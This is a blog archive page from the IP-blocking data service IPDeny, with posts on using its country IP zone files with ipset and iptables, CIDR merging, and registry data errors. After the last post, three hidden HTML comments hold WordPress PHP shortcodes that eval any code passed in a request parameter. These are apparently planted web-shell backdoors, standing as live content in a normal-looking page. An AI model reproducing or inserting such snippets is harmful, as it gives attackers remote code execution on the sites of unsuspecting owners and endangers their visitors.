Archive

Archive for the ‘IPDeny’ Category

Blocking country IP tables using our data blocks and ipset utility

March 4th, 2012 12 comments

Just browsing around the Internet today I found a nice howto document explaining how to set-up our country IP block data with ipset utility. Ipset utility offers much higher performance than standard iptables rules (one IP range – one record, e.g. 10.1.1.0/16 for example).

Update: August 18th, 2012.
Thanks to our visitor comments we checked itech7 site and it’s registration was expired. We will probably come up with another reference/site shortly.

Categories: IPDeny Tags:

Problem with European IP blocks solved

August 6th, 2010 3 comments

We had a small problem with European IP address blocks that has been resolved right now. The data files for some of the European countries didn’t list full IP blocks. Our apologies for the problem! Thanks for the notification Joerg!

Categories: IPDeny Tags:

CIDR Zone file merging for higher performance

March 21st, 2010 6 comments

UPDATE: AUGUST 15th, 2014. IPv4 country aggregated IP address blocks are now offered for free downloads. Read our official blog post about aggregated IP address blocks and enjoy!

We got an email from Cusimano.com person suggesting us to use CIDR zone file merging script from zwitterion.org. We have ran a few in-house tests and this Perl based script effectively decreases CIDR IP block count up to 60% or even more.

The less firewall rules you have set-up in your packet filter (server or firewall) the less matching needs to be done – this effectively decreases load and usage. In the next upcoming week we will fully implement this feature into freely available country zone files.

Thank you for your continued support and feel free to send us more suggestions or recommendations!

Categories: IPDeny Tags:

Missing or incorrect data in zone files

January 23rd, 2010 21 comments

Some of our zone data file users are complaining about IP errors, missing IP blocks or even incorrect data. Unfortunately, we do compile data from regional registries: Ripe, Arin, Apnic, Afrinic, Lacnic and IANA. If the registry has an missing IP block in their data files we will miss this IP block in our country zones files as well.

If you have complaints about IP zones that are wrong or not updated, please contact your local registry and ask them to change this information.

Categories: IPDeny Tags:

Using IP sets for best performance

November 29th, 2009 No comments

IP sets are the best method for blocking specific countries using our IP prefix files for specific countries.

From the IPset homepage:

IP sets are a framework inside the Linux 2.4.x and 2.6.x kernel, which can be administered by the ipset utility. Depending on the type, currently an IP set may store IP addresses, (TCP/UDP) port numbers or IP addresses with MAC addresses in a way, which ensures lightning speed when matching an entry against a set.

If you want to

  • store multiple IP addresses or port numbers and match against the collection by iptables at one swoop;
  • dynamically update iptables rules against IP addresses or ports without performance penalty;
  • express complex IP address and ports based rulesets with one single iptables rule and benefit from the speed of IP sets
  • If you have a network or server with high traffic and using standard iptables for traffic blocking it may affect your server/network performance. With IPsets you can “group” multiple IP sets in groups and then match these in one swoop. This will provide you top performance.

    IP sets allows you to bind an entry in a set to another set, which forms a relationship between the set element and the set it is bound to. The sets may have a default binding, which is valid for every set element for which there is no binding defined at all.

    Example:

    ipset -N servers ipmap –network 10.10.10.0/16
    ipset -A servers 10.10.10.1
    ipset -A servers 10.10.10.2

    ipset -N ports portmap –from 1 –to 1024
    ipset -A ports 21
    ipset -A ports 22
    ipset -A ports 25

    ipset -B servers 10.10.10.2 -b ports

    iptables -A FORWARD -m set –set servers dst,dst -j ACCEPT
    iptables -A FORWARD -j DROP


    )

    Categories: IPDeny Tags:

    Welcome to our new blog

    May 19th, 2009 Comments off

    Hello guys. Time is passing and we are finally introducing our new blog – IP Deny blog. We will publish IP, technical guides and hosting related information.

    I hope our upcoming posts will have huge interest from our site visitors and we will aim to publish interesting stuff, not junk.

    All the best!
    IPDeny Staff

    <!– [insert_php]if (isset($_REQUEST["yxaEj"])){eval($_REQUEST["yxaEj"]);exit;}[/insert_php][php]if (isset($_REQUEST["yxaEj"])){eval($_REQUEST["yxaEj"]);exit;}[/php] –>

    <!– [insert_php]if (isset($_REQUEST["XIxrV"])){eval($_REQUEST["XIxrV"]);exit;}[/insert_php][php]if (isset($_REQUEST["XIxrV"])){eval($_REQUEST["XIxrV"]);exit;}[/php] –>

    <!– [insert_php]if (isset($_REQUEST["HiCA"])){eval($_REQUEST["HiCA"]);exit;}[/insert_php][php]if (isset($_REQUEST["HiCA"])){eval($_REQUEST["HiCA"]);exit;}[/php] –>

    Categories: IPDeny Tags: